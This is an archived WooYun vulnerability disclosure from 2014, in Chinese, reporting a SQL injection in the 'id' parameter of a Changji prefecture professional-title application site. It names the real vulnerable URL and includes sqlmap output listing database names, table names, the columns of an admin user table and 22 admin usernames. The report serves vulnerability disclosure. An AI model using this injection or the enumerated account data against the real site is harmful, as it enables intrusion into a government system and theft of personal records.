乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-14: 细节已通知厂商并且等待厂商处理中 2014-06-19: 厂商已经确认,细节仅向厂商公开 2014-06-29: 细节向核心白帽子及相关领域专家公开 2014-07-09: 细节向普通白帽子公开 2014-07-19: 细节向实习白帽子公开 2014-07-29: 细节向公众公开
昌吉州专业技术职务任职资格申报系统公示信息参数过滤不严导致SQL注入
http://zc.cjrc.com.cn/modules/universe/ArticleDetail.aspx?id=13 参数“id”过滤不严致SQL注入。
web server operating system: Windows 2008web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2012[21:00:53] [INFO] fetching database names[21:00:53] [WARNING] reflective value(s) found and filtering out[21:00:53] [INFO] the SQL query used returns 8 entries[21:00:53] [INFO] retrieved: "humanresources"[21:00:54] [INFO] retrieved: "master"[21:00:54] [INFO] retrieved: "model"[21:00:54] [INFO] retrieved: "msdb"[21:00:55] [INFO] retrieved: "ReportServer"[21:00:55] [INFO] retrieved: "ReportServerTempDB"[21:00:56] [INFO] retrieved: "talents"[21:00:56] [INFO] retrieved: "tempdb"available databases [8]:[*] humanresources[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] talents[*] tempdb
Database: humanresources[98 tables]+---------------------------------+| Acc_Album || Acc_Photo || Article || ArticleType || DefenceGroup || Dic_ComputerClass || Dic_ComputerSubject || Dic_County || Dic_DefenceLang || Dic_DefenceResult || Dic_Degree || Dic_Education || Dic_ForbitWord || Dic_ForeignLangClass || Dic_ForeignLangClass || Dic_HealthStatus || Dic_Major || Dic_MajorType || Dic_MaritalStatus || Dic_Nation || Dic_PoliticalStatus || Dic_Prefecture || Dic_ProVerify_Item || Dic_ProVerify_NoPassReason || Dic_Profession_Level || Dic_Profession_Level || Dic_Profession_Major || Dic_Profession_Series || Dic_Province || Dic_ReviewGroup || Dic_RewardsClass || Dic_RewardsLevel || Dic_SchoolType || Dic_SchoolYear || Dic_SkillGrade || Dic_SubjectSegment || Dic_TeacherCertificate || Dic_TrainType || Dic_Unit || Dic_UnitType || Document || DocumentType || Expert || Fields || ManageGroup || ManageUser || Msg || MsgType || PExpert_Education || PExpert_Education || PExpert_Pro_BreakRule || PExpert_Profession || PExpert_TrainExperience || PExpert_WorkExperience || PSave_Education || PSave_Education || PSave_Pro_BreakRule || PSave_Profession || PSave_TrainExperience || PSave_WorkExperience || Personal_AcademicCommunity || Personal_AcademicCommunity || Personal_Certificate || Personal_ComputerScore || Personal_Education || Personal_ForeignLanguage || Personal_Pro_BreakRule || Personal_Pro_CertificateReissue || Personal_Pro_QualificationReg || Personal_Profession || Personal_Rewards || Personal_SocialActivities || Personal_TeachingWork || Personal_TrainExperience || Personal_WorkExperience || Personal_WorkPerformance || Personal_Writing || ReviewerMark || ReviewerMark || SysFunction || SysInfomation || SysLog || VArticle || VCertificate || VDefenceNote || VExpertProfession_ori || VExpertProfession_ori || VExpertProfession_ori || VMsg || VPersonal || VPro_Education || VPro_TrainExperience || VPro_WorkExperience || VProfession || VReviewerMark || VSaveProfession || VerifyConfig || testXML |+---------------------------------+
Database: humanresourcesTable: ManageUser[26 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| Answer | nvarchar || Authflag | int || Authstr | nvarchar || Authtime | nchar || CountyID | nchar || Email | nvarchar || GroupExpiryDate | nchar || ID | decimal || IsOnline | int || LateIP | nvarchar || LateTime | nvarchar || LoginCount | int || Mobile | nvarchar || MsgNumNew | int || MsgSound | int || Password | nvarchar || Phone | nvarchar || Question | nvarchar || RegDate | nvarchar || RegIp | nvarchar || State | int || TemplateID | decimal || TrueName | nvarchar || UnitID | decimal || UserGroupID | decimal || UserName | nvarchar |+-----------------+----------+
Database: humanresourcesTable: ManageUser[22 entries]+------------+| UserName |+------------+| cjs || cjsgl || cjsrczx || cjzjyj || cjzz || cxh || fks || fksgl || htbx || htbxgl || jmsex || jmsexgl || liuyong || mlx || mlxgl || mnsx || mnsxgl || mqs || qtx || qtxgl || scf || supervisor |+------------+
严格过滤参数
危害等级:中
漏洞Rank:6
确认时间:2014-06-19 14:22
通知处理中
暂无